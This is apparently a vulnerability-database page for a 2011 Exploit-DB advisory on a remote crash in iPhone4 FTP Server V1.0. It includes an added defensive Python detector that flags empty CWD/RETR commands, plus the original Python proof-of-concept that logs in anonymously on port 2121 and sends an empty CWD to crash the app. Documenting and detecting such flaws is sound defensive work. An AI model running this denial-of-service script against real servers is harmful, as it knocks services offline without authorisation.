Vendor: iPhone4 FTP Server
By: offsetIntruder
CVSS: 7.5 (HIGH)
Remote Crash
CWE: N/A
Product Name: iPhone4 FTP Server
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE: N/A
CPE: a:zhang_boyang:iphone4_ftp_server
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: iPhone4 IOS 4.3.2
Year: 2011

iPhone4 FTP Server V1.0 – Empty CWD-RETR Remote Crash

The iPhone4 FTP Server V1.0 application can be crashed remotely: an attacker who sends an empty CWD command to the FTP server running on port 2121 causes the application to crash.

Mitigation:

No known mitigation or remediation for this vulnerability.
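
An added example, not part of the original advisory or the Exploit-DB entry: since no fix is listed, a sensor or proxy that sees the control channel on port 2121 can at least flag the triggering input. The sketch reassembles FTP command lines across TCP segments and reports CWD or RETR commands whose argument is missing or blank; the class name, the line-length cap and the sample segments are assumptions constructed for illustration.

```python
PATH_COMMANDS = {b"CWD", b"RETR"}  # verbs named in the advisory title
MAX_LINE = 4096  # assumed cap so an unterminated line cannot grow the buffer


class EmptyPathDetector:
    """Flags CWD/RETR commands whose pathname is missing or only whitespace."""

    def __init__(self):
        self._buf = b""
        self.alerts = []  # list of (verb, raw_line) tuples

    def feed(self, segment):
        """Accept one TCP payload; commands may be split across segments."""
        self._buf += segment
        while b"\n" in self._buf:
            line, self._buf = self._buf.split(b"\n", 1)
            self._inspect(line.rstrip(b"\r"))
        if len(self._buf) > MAX_LINE:
            self._buf = b""  # discard an oversized partial line

    def _inspect(self, line):
        # FTP verbs are case-insensitive; strip() makes "CWD " equal to "CWD".
        verb, _, arg = line.strip().partition(b" ")
        if verb.upper() in PATH_COMMANDS and not arg.strip():
            self.alerts.append((verb.upper().decode("ascii"), line))


def scan(segments):
    """Run the detector over an iterable of payloads; return flagged verbs."""
    det = EmptyPathDetector()
    for seg in segments:
        det.feed(seg)
    return [verb for verb, _ in det.alerts]


# Constructed sample traffic (not captured from a real device).
SAMPLE = [
    b"USER anonymous\r\n",
    b"CW", b"D \r\n",            # empty CWD split across two segments
    b"CWD /pub\r\nRETR\r\n",     # valid CWD, then RETR with no argument
    b"retr  \t\r\n",             # lower-case verb, whitespace-only argument
]

if __name__ == "__main__":
    print(scan(SAMPLE))
```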

Exploit-DB raw data:

# Exploit Title: iPhone4 FTP Server V1.0 - Empty CWD-RETR Remote Crash
# Date: 2011-05-30
# Author: offsetIntruder
# Software Link: http://itunes.apple.com/us/app/ftp-server/id356055128?mt=8
# Version: 1.0
# Tested on: iPhone4 IOS 4.3.2
# CVE: N/A
 
import socket
import sys
 
user="anonymous"

 
print("\n iPhone4 FTP Server By Zhang Boyang - Empty CWD-RETR Remote Crash\n")


def ExploitFTP(target):
	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.connect((target,2121))
	data = s.recv(1024)
	print("[+] Sending user login...")
	s.send("USER " + user + '\r\n')
	data = s.recv(1024)
	print("[+] Sending empty CWD...\n")
	s.send("CWD \r\n")
	data = s.recv(1024)
	s.close()
	
target = sys.argv[1]
 
ExploitFTP(target)